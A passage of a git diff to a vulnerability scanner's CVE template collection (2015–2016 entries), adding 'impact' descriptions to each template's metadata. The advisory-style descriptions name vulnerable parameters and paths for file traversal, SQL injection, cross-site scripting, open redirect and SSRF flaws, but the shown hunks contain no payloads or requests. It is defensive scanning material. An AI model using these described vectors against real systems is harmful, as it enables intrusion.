+5,8 @@ info: author: 0x_Akoko severity: medium description: Bonita BPM Portal before 6.5.3 allows remote attackers to read arbitrary files via a .. (dot dot) in the theme parameter and a file path in the location parameter to bonita/portal/themeResource. + impact: | + An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to unauthorized access or information disclosure. remediation: | Upgrade Bonita BPM Portal to version 6.5.3 or later to mitigate the vulnerability. reference: diff --git a/http/cves/2015/CVE-2015-4050.yaml b/http/cves/2015/CVE-2015-4050.yaml index 1fa80cde3b..f6589b14c8 100644 --- a/http/cves/2015/CVE-2015-4050.yaml +++ b/http/cves/2015/CVE-2015-4050.yaml @@ -5,6 +5,8 @@ info: author: ELSFA7110,meme-lord severity: medium description: Symfony 2.3.19 through 2.3.28, 2.4.9 through 2.4.10, 2.5.4 through 2.5.11, and 2.6.0 through 2.6.7, when ESI or SSI support enabled, does not check if the _controller attribute is set, which allows remote attackers to bypass URL signing and security rules by including (1) no hash or (2) an invalid hash in a request to /_fragment in the HttpKernel component. + impact: | + Successful exploitation of this vulnerability could allow an attacker to bypass authentication and gain unauthorized access to the affected system. remediation: | Apply the latest security patches or upgrade to a non-vulnerable version of Symfony. reference: diff --git a/http/cves/2015/CVE-2015-4062.yaml b/http/cves/2015/CVE-2015-4062.yaml index 1c5d7fa538..2493a4fdec 100644 --- a/http/cves/2015/CVE-2015-4062.yaml +++ b/http/cves/2015/CVE-2015-4062.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress NewStatPress 0.9.8 plugin contains a SQL injection vulnerability in includes/nsp_search.php. A remote authenticated user can execute arbitrary SQL commands via the where1 parameter in the nsp_search page to wp-admin/admin.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage. remediation: | Update to plugin version 0.9.9 or latest. reference: diff --git a/http/cves/2015/CVE-2015-4063.yaml b/http/cves/2015/CVE-2015-4063.yaml index 95b0e43b1e..1ac80375f6 100644 --- a/http/cves/2015/CVE-2015-4063.yaml +++ b/http/cves/2015/CVE-2015-4063.yaml @@ -6,6 +6,8 @@ info: severity: low description: | WordPress NewStatPress plugin before 0.9.9 contains a cross-site scripting vulnerability in includes/nsp_search.php. The plugin allows remote authenticated users to inject arbitrary web script or HTML via the where1 parameter in the nsp_search page to wp-admin/admin.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement. remediation: Update to plugin version 0.9.9 or latest. reference: - https://packetstormsecurity.com/files/132038/ diff --git a/http/cves/2015/CVE-2015-4074.yaml b/http/cves/2015/CVE-2015-4074.yaml index 365ca1cc3d..94e9b5c4f3 100644 --- a/http/cves/2015/CVE-2015-4074.yaml +++ b/http/cves/2015/CVE-2015-4074.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: high description: Directory traversal vulnerability in the Helpdesk Pro plugin before 1.4.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the filename parameter in a ticket.download_attachment task. + impact: | + An attacker can exploit this vulnerability to read sensitive files on the server. remediation: | Upgrade to Joomla! Helpdesk Pro plugin version 1.4.0 or later to fix the local file inclusion vulnerability. reference: diff --git a/http/cves/2015/CVE-2015-4127.yaml b/http/cves/2015/CVE-2015-4127.yaml index c1c52ef74b..14b02a0a89 100644 --- a/http/cves/2015/CVE-2015-4127.yaml +++ b/http/cves/2015/CVE-2015-4127.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Church Admin plugin before 0.810 allows remote attackers to inject arbitrary web script or HTML via the address parameter via index.php/2015/05/21/church_admin-registration-form/. + impact: | + Allows attackers to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions. remediation: | Update to the latest version of the WordPress Church Admin plugin (0.810 or higher) to mitigate this vulnerability. reference: diff --git a/http/cves/2015/CVE-2015-4414.yaml b/http/cves/2015/CVE-2015-4414.yaml index bd4520fd3b..f6ce4a9470 100644 --- a/http/cves/2015/CVE-2015-4414.yaml +++ b/http/cves/2015/CVE-2015-4414.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress SE HTML5 Album Audio Player 1.1.0 contains a directory traversal vulnerability in download_audio.php that allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter. + impact: | + An attacker can exploit this vulnerability to access sensitive files on the server, potentially leading to unauthorized disclosure of sensitive information. remediation: | Update to the latest version of WordPress SE HTML5 Album Audio Player or apply the vendor-supplied patch to fix the directory traversal vulnerability. reference: diff --git a/http/cves/2015/CVE-2015-4632.yaml b/http/cves/2015/CVE-2015-4632.yaml index 734920247d..497d5b5b16 100644 --- a/http/cves/2015/CVE-2015-4632.yaml +++ b/http/cves/2015/CVE-2015-4632.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, 3.18.x before 3.18.08, and 3.20.x before 3.20.1 allow remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the template_path parameter to (1) svc/virtualshelves/search or (2) svc/members/search. + impact: | + An attacker can read or modify sensitive files, potentially leading to unauthorized access, data leakage, or system compromise. remediation: | Upgrade to a patched version of Koha or apply the necessary security patches to fix the directory traversal vulnerability. reference: diff --git a/http/cves/2015/CVE-2015-4666.yaml b/http/cves/2015/CVE-2015-4666.yaml index 6a9d415637..e5ae3def7b 100644 --- a/http/cves/2015/CVE-2015-4666.yaml +++ b/http/cves/2015/CVE-2015-4666.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: medium description: Xceedium Xsuite 2.4.4.5 and earlier is vulnerable to local file inclusion via opm/read_sessionlog.php that allows remote attackers to read arbitrary files in the logFile parameter. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, disclosure of sensitive information, and potential remote code execution. remediation: | Upgrade Xceedium Xsuite to a version higher than 2.4.4.5 or apply the necessary patches provided by the vendor. reference: diff --git a/http/cves/2015/CVE-2015-4668.yaml b/http/cves/2015/CVE-2015-4668.yaml index cf5e935f94..b4e022cc6e 100644 --- a/http/cves/2015/CVE-2015-4668.yaml +++ b/http/cves/2015/CVE-2015-4668.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Xsuite 2.4.4.5 and prior contains an open redirect vulnerability, which can allow a remote attacker to redirect users to arbitrary web sites and conduct phishing attacks via a malicious URL in the redirurl parameter. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the installation of malware. remediation: | Upgrade Xsuite to a version higher than 2.4.4.5 to mitigate the open redirect vulnerability. reference: diff --git a/http/cves/2015/CVE-2015-4694.yaml b/http/cves/2015/CVE-2015-4694.yaml index 49934d3c68..a4957d1cfd 100644 --- a/http/cves/2015/CVE-2015-4694.yaml +++ b/http/cves/2015/CVE-2015-4694.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: high description: WordPress zip-attachments plugin allows arbitrary file retrieval as it does not check the download path of the requested file. + impact: | + Arbitrary file retrieval remediation: | Update to the latest version of the WordPress Zip Attachments plugin (1.1.4) or remove the plugin if not needed. reference: diff --git a/http/cves/2015/CVE-2015-5354.yaml b/http/cves/2015/CVE-2015-5354.yaml index 342cc2a461..6782a616fe 100644 --- a/http/cves/2015/CVE-2015-5354.yaml +++ b/http/cves/2015/CVE-2015-5354.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: medium description: Novius OS 5.0.1 (Elche) allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the redirect parameter to admin/nos/login. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the download of malware. remediation: | Apply the latest security patches or upgrade to a newer version of Novius OS. reference: diff --git a/http/cves/2015/CVE-2015-5461.yaml b/http/cves/2015/CVE-2015-5461.yaml index ac154585d3..b39a745318 100644 --- a/http/cves/2015/CVE-2015-5461.yaml +++ b/http/cves/2015/CVE-2015-5461.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: medium description: WordPress StageShow plugin before 5.0.9 contains an open redirect vulnerability in the Redirect function in stageshow_redirect.php. A remote attacker can redirect users to arbitrary web sites and conduct phishing attacks via a malicious URL in the url parameter. + impact: | + An attacker can trick users into visiting a malicious website, leading to potential phishing attacks. remediation: | Update to the latest version of the WordPress StageShow plugin (5.0.9 or higher) to fix the open redirect vulnerability. reference: diff --git a/http/cves/2015/CVE-2015-5469.yaml b/http/cves/2015/CVE-2015-5469.yaml index d1fbad2989..1fb393e157 100644 --- a/http/cves/2015/CVE-2015-5469.yaml +++ b/http/cves/2015/CVE-2015-5469.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: high description: WordPress MDC YouTube Downloader 2.1.0 plugin is susceptible to local file inclusion. A remote attacker can read arbitrary files via a full pathname in the file parameter to includes/download.php. + impact: | + The vulnerability can lead to unauthorized access to sensitive files, execution of arbitrary code, and potential compromise of the entire WordPress installation. remediation: | Update to the latest version of WordPress MDC YouTube Downloader plugin or apply the patch provided by the vendor. reference: diff --git a/http/cves/2015/CVE-2015-5471.yaml b/http/cves/2015/CVE-2015-5471.yaml index 6ca9367a13..2863470087 100644 --- a/http/cves/2015/CVE-2015-5471.yaml +++ b/http/cves/2015/CVE-2015-5471.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: medium description: The program /wp-swimteam/include/user/download.php allows unauthenticated attackers to retrieve arbitrary files from the system. + impact: | + An attacker can exploit this vulnerability to read sensitive information from the server, such as database credentials, and potentially execute arbitrary code. remediation: Upgrade to Swim Team version 1.45 or newer. reference: - https://wpscan.com/vulnerability/b00d9dda-721d-4204-8995-093f695c3568 diff --git a/http/cves/2015/CVE-2015-5531.yaml b/http/cves/2015/CVE-2015-5531.yaml index 6dafb2f144..fc0908a4d0 100644 --- a/http/cves/2015/CVE-2015-5531.yaml +++ b/http/cves/2015/CVE-2015-5531.yaml @@ -5,6 +5,8 @@ info: author: princechaddha severity: medium description: ElasticSearch before 1.6.1 allows remote attackers to read arbitrary files via unspecified vectors related to snapshot API calls. + impact: | + Successful exploitation of this vulnerability allows an attacker to read arbitrary files on the server, potentially leading to unauthorized access or sensitive information disclosure. remediation: | Upgrade ElasticSearch to version 1.6.1 or later to mitigate the vulnerability. reference: diff --git a/http/cves/2015/CVE-2015-5688.yaml b/http/cves/2015/CVE-2015-5688.yaml index bd70549171..e1320df876 100644 --- a/http/cves/2015/CVE-2015-5688.yaml +++ b/http/cves/2015/CVE-2015-5688.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: Geddy prior to version 13.0.8 contains a directory traversal vulnerability in lib/app/index.js that allows remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the PATH_INFO to the default URI. + impact: | + The vulnerability can be exploited to read sensitive files, execute arbitrary code, or gain unauthorized access to the system. remediation: | Upgrade Geddy to version 13.0.8 or later to mitigate the vulnerability. reference: diff --git a/http/cves/2015/CVE-2015-6477.yaml b/http/cves/2015/CVE-2015-6477.yaml index 3b62efb3e0..39e7c3b527 100644 --- a/http/cves/2015/CVE-2015-6477.yaml +++ b/http/cves/2015/CVE-2015-6477.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: medium description: Nordex NC2 contains a cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2015/CVE-2015-6544.yaml b/http/cves/2015/CVE-2015-6544.yaml index 1f58a92ffb..05d483ebb3 100644 --- a/http/cves/2015/CVE-2015-6544.yaml +++ b/http/cves/2015/CVE-2015-6544.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Combodo iTop before 2.2.0-2459 contains a cross-site scripting vulnerability in application/dashboard.class.inc.php which allows remote attackers to inject arbitrary web script or HTML via a dashboard title. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to a version of Combodo iTop that is equal to or greater than 2.2.0-2459 to mitigate this vulnerability. reference: diff --git a/http/cves/2015/CVE-2015-7245.yaml b/http/cves/2015/CVE-2015-7245.yaml index f3e6c625e2..db50314d39 100644 --- a/http/cves/2015/CVE-2015-7245.yaml +++ b/http/cves/2015/CVE-2015-7245.yaml @@ -6,6 +6,8 @@ info: severity: high description: | D-Link DVG-N5402SP is susceptible to local file inclusion in products with firmware W1000CN-00, W1000CN-03, or W2000EN-00. A remote attacker can read sensitive information via a .. (dot dot) in the errorpage parameter. + impact: | + An attacker can read sensitive files on the system, potentially leading to unauthorized access or disclosure of sensitive information. remediation: | Update the router firmware to the latest version, which includes a fix for the local file inclusion vulnerability. reference: diff --git a/http/cves/2015/CVE-2015-7297.yaml b/http/cves/2015/CVE-2015-7297.yaml index 8aa056114e..2f148b0341 100644 --- a/http/cves/2015/CVE-2015-7297.yaml +++ b/http/cves/2015/CVE-2015-7297.yaml @@ -5,6 +5,8 @@ info: author: princechaddha severity: high description: A SQL injection vulnerability in Joomla! 3.2 before 3.4.4 allows remote attackers to execute arbitrary SQL commands. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the Joomla! CMS. remediation: | Apply the latest security patches and updates provided by Joomla! to mitigate the SQL Injection vulnerability. reference: diff --git a/http/cves/2015/CVE-2015-7377.yaml b/http/cves/2015/CVE-2015-7377.yaml index 7da41df920..07b6ea13c5 100644 --- a/http/cves/2015/CVE-2015-7377.yaml +++ b/http/cves/2015/CVE-2015-7377.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress Pie Register before 2.0.19 contains a reflected cross-site scripting vulnerability in pie-register/pie-register.php which allows remote attackers to inject arbitrary web script or HTML via the invitaion_code parameter in a pie-register page to the default URL. + impact: | + Successful exploitation of this vulnerability could lead to the execution of arbitrary script code in the context of the affected website, potentially allowing an attacker to steal sensitive information or perform unauthorized actions. remediation: | Update to the latest version of the WordPress Pie-Register plugin (2.0.19 or higher) to mitigate this vulnerability. reference: diff --git a/http/cves/2015/CVE-2015-7450.yaml b/http/cves/2015/CVE-2015-7450.yaml index f38ade74c4..3662e329ce 100644 --- a/http/cves/2015/CVE-2015-7450.yaml +++ b/http/cves/2015/CVE-2015-7450.yaml @@ -5,6 +5,8 @@ info: author: wdahlenb severity: critical description: IBM Websphere Application Server 7, 8, and 8.5 have a deserialization vulnerability in the SOAP Connector (port 8880 by default). + impact: | + Successful exploitation of this vulnerability can lead to remote code execution, allowing an attacker to execute arbitrary code on the affected system. remediation: | Apply the latest security patches provided by IBM to mitigate this vulnerability. reference: diff --git a/http/cves/2015/CVE-2015-7780.yaml b/http/cves/2015/CVE-2015-7780.yaml index 0252460cd3..5240d6dcb6 100644 --- a/http/cves/2015/CVE-2015-7780.yaml +++ b/http/cves/2015/CVE-2015-7780.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: ManageEngine Firewall Analyzer before 8.0 is vulnerable to local file inclusion. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the target system, potentially leading to unauthorized access or information disclosure. remediation: | Upgrade to a version of ManageEngine Firewall Analyzer that is equal to or greater than 8.0 to mitigate this vulnerability. reference: diff --git a/http/cves/2015/CVE-2015-7823.yaml b/http/cves/2015/CVE-2015-7823.yaml index af59249a0d..0515be845f 100644 --- a/http/cves/2015/CVE-2015-7823.yaml +++ b/http/cves/2015/CVE-2015-7823.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: medium description: Kentico CMS 8.2 contains an open redirect vulnerability via GetDocLink.ashx with link variable. An attacker can construct a URL within the application that causes a redirection to an arbitrary external domain. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the installation of malware. remediation: | Apply the latest security patches or upgrade to a newer version of Kentico CMS. reference: diff --git a/http/cves/2015/CVE-2015-8349.yaml b/http/cves/2015/CVE-2015-8349.yaml index ed428ef892..ad247d190c 100644 --- a/http/cves/2015/CVE-2015-8349.yaml +++ b/http/cves/2015/CVE-2015-8349.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: SourceBans before 2.0 contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary web script or HTML via the advSearch parameter to index.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to a version of SourceBans that is 2.0 or above, which includes a fix for this vulnerability. reference: diff --git a/http/cves/2015/CVE-2015-8399.yaml b/http/cves/2015/CVE-2015-8399.yaml index 158d15948f..46df9c860e 100644 --- a/http/cves/2015/CVE-2015-8399.yaml +++ b/http/cves/2015/CVE-2015-8399.yaml @@ -5,6 +5,8 @@ info: author: princechaddha severity: medium description: Atlassian Confluence before 5.8.17 contains an information disclsoure vulnerability. A remote authenticated user can read configuration files via the decoratorName parameter to (1) spaces/viewdefaultdecorator.action or (2) admin/viewdefaultdecorator.action. + impact: | + An attacker can exploit this vulnerability to gain access to sensitive information. remediation: | Upgrade to a version higher than 5.8.17 to mitigate the vulnerability. reference: diff --git a/http/cves/2015/CVE-2015-8813.yaml b/http/cves/2015/CVE-2015-8813.yaml index cce93f1e64..bae13a33c2 100644 --- a/http/cves/2015/CVE-2015-8813.yaml +++ b/http/cves/2015/CVE-2015-8813.yaml @@ -5,6 +5,8 @@ info: author: emadshanab severity: high description: Umbraco before version 7.4.0 contains a server-side request forgery vulnerability in feedproxy.aspx that allows attackers to send arbitrary HTTP GET requests via http://local/Umbraco/feedproxy.aspx?url=http://127.0.0.1:80/index. + impact: | + The vulnerability can result in unauthorized access to sensitive information or systems, leading to potential data breaches or further exploitation. remediation: | Upgrade Umbraco to version 7.4.0 or above to mitigate the vulnerability and apply any necessary patches or security updates. reference: diff --git a/http/cves/2015/CVE-2015-9312.yaml b/http/cves/2015/CVE-2015-9312.yaml index 2d94216a6d..f50ad6edf5 100644 --- a/http/cves/2015/CVE-2015-9312.yaml +++ b/http/cves/2015/CVE-2015-9312.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress NewStatPress plugin through 1.0.4 contains a cross-site scripting vulnerability. The plugin utilizes, on lines 28 and 31 of the file "includes/nsp_search.php", several variables from the $_GET scope without sanitation. While WordPress automatically escapes quotes on this scope, the outputs on these lines are outside of quotes, and as such can be utilized to initiate a cross-site scripting attack. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected website, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: Fixed in version 1.0.6 reference: - https://wpscan.com/vulnerability/46bf6c69-b612-4aee-965d-91f53f642054 diff --git a/http/cves/2015/CVE-2015-9323.yaml b/http/cves/2015/CVE-2015-9323.yaml index 2c504b159c..f95b3c842d 100644 --- a/http/cves/2015/CVE-2015-9323.yaml +++ b/http/cves/2015/CVE-2015-9323.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | The 404 to 301 – Redirect, Log and Notify 404 Errors WordPress plugin was affected by an Authenticated Blind SQL Injection security vulnerability. + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access, data leakage, or potential compromise of the WordPress site. remediation: Fixed in version 2.0.3 reference: - https://wpscan.com/vulnerability/61586816-dd2b-461d-975f-1989502affd9 diff --git a/http/cves/2015/CVE-2015-9414.yaml b/http/cves/2015/CVE-2015-9414.yaml index 1204101b5c..9eafdb5750 100644 --- a/http/cves/2015/CVE-2015-9414.yaml +++ b/http/cves/2015/CVE-2015-9414.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress Symposium through 15.8.1 contains a reflected cross-site scripting vulnerability via the wp-content/plugins/wp-symposium/get_album_item.php?size parameter which allows an attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions. remediation: | Update to the latest version of the WordPress Symposium plugin (>=15.8.2) which includes a fix for this vulnerability. reference: diff --git a/http/cves/2015/CVE-2015-9480.yaml b/http/cves/2015/CVE-2015-9480.yaml index 648c45c099..aea74c9169 100644 --- a/http/cves/2015/CVE-2015-9480.yaml +++ b/http/cves/2015/CVE-2015-9480.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: The RobotCPA plugin 5 for WordPress has directory traversal via the f.php l parameter. + impact: | + An attacker can access sensitive files on the server, potentially leading to unauthorized access, data leakage, or further exploitation. remediation: | Update to the latest version of the WordPress RobotCPA 5 plugin to fix the directory traversal vulnerability. reference: diff --git a/http/cves/2016/CVE-2016-0957.yaml b/http/cves/2016/CVE-2016-0957.yaml index 4db32683c5..90a0205541 100644 --- a/http/cves/2016/CVE-2016-0957.yaml +++ b/http/cves/2016/CVE-2016-0957.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: high description: Dispatcher before 4.1.5 in Adobe Experience Manager 5.6.1, 6.0.0, and 6.1.0 does not properly implement a URL filter, which allows remote attackers to bypass dispatcher rules via unspecified vectors. + impact: | + The vulnerability allows attackers to bypass security rules and potentially gain unauthorized access to sensitive information or perform malicious actions. remediation: | Upgrade to Adobe AEM Dispatcher version 4.15 or higher to fix the vulnerability. reference: diff --git a/http/cves/2016/CVE-2016-1000126.yaml b/http/cves/2016/CVE-2016-1000126.yaml index 25c2ae22a3..511a7ed38a 100644 --- a/http/cves/2016/CVE-2016-1000126.yaml +++ b/http/cves/2016/CVE-2016-1000126.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress Admin Font Editor 1.8 and before contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + This vulnerability allows an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update to the latest version of the WordPress Admin Font Editor plugin (1.8 or higher) to fix this vulnerability. reference: diff --git a/http/cves/2016/CVE-2016-1000127.yaml b/http/cves/2016/CVE-2016-1000127.yaml index 0f1d757108..18a07d5fc9 100644 --- a/http/cves/2016/CVE-2016-1000127.yaml +++ b/http/cves/2016/CVE-2016-1000127.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress AJAX Random Post 2.00 is vulnerable to reflected cross-site scripting. + impact: | + This vulnerability allows an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update to the latest version of the WordPress AJAX Random Post plugin (2.00 or higher) to fix this issue. reference: diff --git a/http/cves/2016/CVE-2016-1000129.yaml b/http/cves/2016/CVE-2016-1000129.yaml index b6aae8a6bd..79ca19c4fd 100644 --- a/http/cves/2016/CVE-2016-1000129.yaml +++ b/http/cves/2016/CVE-2016-1000129.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress defa-online-image-protector 3.3 and before contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update to the latest version of the WordPress defa-online-image-protector plugin (version 3.3 or higher) to mitigate this vulnerability. reference: diff --git a/http/cves/2016/CVE-2016-1000130.yaml b/http/cves/2016/CVE-2016-1000130.yaml index 1cd7eca464..c2b5be93c0 100644 --- a/http/cves/2016/CVE-2016-1000130.yaml +++ b/http/cves/2016/CVE-2016-1000130.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: Wordpress plugin e-search 1.0 and before contains a cross-site scripting vulnerability via date_select.php which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions. remediation: | Update to the latest version of the WordPress e-search plugin to mitigate this vulnerability. reference: diff --git a/http/cves/2016/CVE-2016-1000131.yaml b/http/cves/2016/CVE-2016-1000131.yaml index b55f7cb4a0..fffebe547d 100644 --- a/http/cves/2016/CVE-2016-1000131.yaml +++ b/http/cves/2016/CVE-2016-1000131.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress e-search 1.0 and before contains a reflected cross-site scripting vulnerability via title_az.php which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement. remediation: | Update to the latest version of the WordPress e-search plugin to mitigate this vulnerability. reference: diff --git a/http/cves/2016/CVE-2016-1000132.yaml b/http/cves/2016/CVE-2016-1000132.yaml index 4f0854fcf0..cfe1007520 100644 --- a/http/cves/2016/CVE-2016-1000132.yaml +++ b/http/cves/2016/CVE-2016-1000132.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress enhanced-tooltipglossary 3.2.8 contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement. remediation: | Update to the latest version of WordPress enhanced-tooltipglossary plugin (3.2.9 or higher) which includes a fix for this vulnerability. reference: diff --git a/http/cves/2016/CVE-2016-1000133.yaml b/http/cves/2016/CVE-2016-1000133.yaml index 0d81f509f8..16b0370298 100644 --- a/http/cves/2016/CVE-2016-1000133.yaml +++ b/http/cves/2016/CVE-2016-1000133.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: Wordpress plugin forget-about-shortcode-buttons 1.1.1 contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Allows attackers to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions. remediation: | Update to the latest version of the WordPress forget-about-shortcode-buttons plugin (1.1.1) or apply the necessary patches. reference: diff --git a/http/cves/2016/CVE-2016-1000134.yaml b/http/cves/2016/CVE-2016-1000134.yaml index 223cfb5ecb..c29a917f7a 100644 --- a/http/cves/2016/CVE-2016-1000134.yaml +++ b/http/cves/2016/CVE-2016-1000134.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress HDW Video Gallery 1.2 and before contains a cross-site scripting vulnerability via playlist.php which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential theft of sensitive information or unauthorized actions. remediation: | Update to the latest version of the WordPress HDW Video Gallery plugin (>=1.3) which includes a fix for this vulnerability. reference: diff --git a/http/cves/2016/CVE-2016-1000135.yaml b/http/cves/2016/CVE-2016-1000135.yaml index 794f281be7..383447e359 100644 --- a/http/cves/2016/CVE-2016-1000135.yaml +++ b/http/cves/2016/CVE-2016-1000135.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress HDW Video Gallery 1.2 and before contains a cross-site scripting vulnerability via mychannel.php which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected website, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update to the latest version of the WordPress HDW Video Gallery plugin (>=1.3) which includes a fix for this vulnerability. reference: diff --git a/http/cves/2016/CVE-2016-1000137.yaml b/http/cves/2016/CVE-2016-1000137.yaml index 2052c3967a..5559223fb9 100644 --- a/http/cves/2016/CVE-2016-1000137.yaml +++ b/http/cves/2016/CVE-2016-1000137.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress Hero Maps Pro 2.1.0 contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update to the latest version of WordPress Hero Maps Pro plugin (2.1.1 or higher) which includes a fix for this vulnerability. reference: diff --git a/http/cves/2016/CVE-2016-1000138.yaml b/http/cves/2016/CVE-2016-1000138.yaml index 1bfabfd267..36f38b0bdd 100644 --- a/http/cves/2016/CVE-2016-1000138.yaml +++ b/http/cves/2016/CVE-2016-1000138.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress Admin Font Editor plugin indexisto 1.8 and before contains a cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + This vulnerability allows an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update to the latest version of the WordPress Admin Font Editor plugin (1.8 or higher) to fix this vulnerability. reference: diff --git 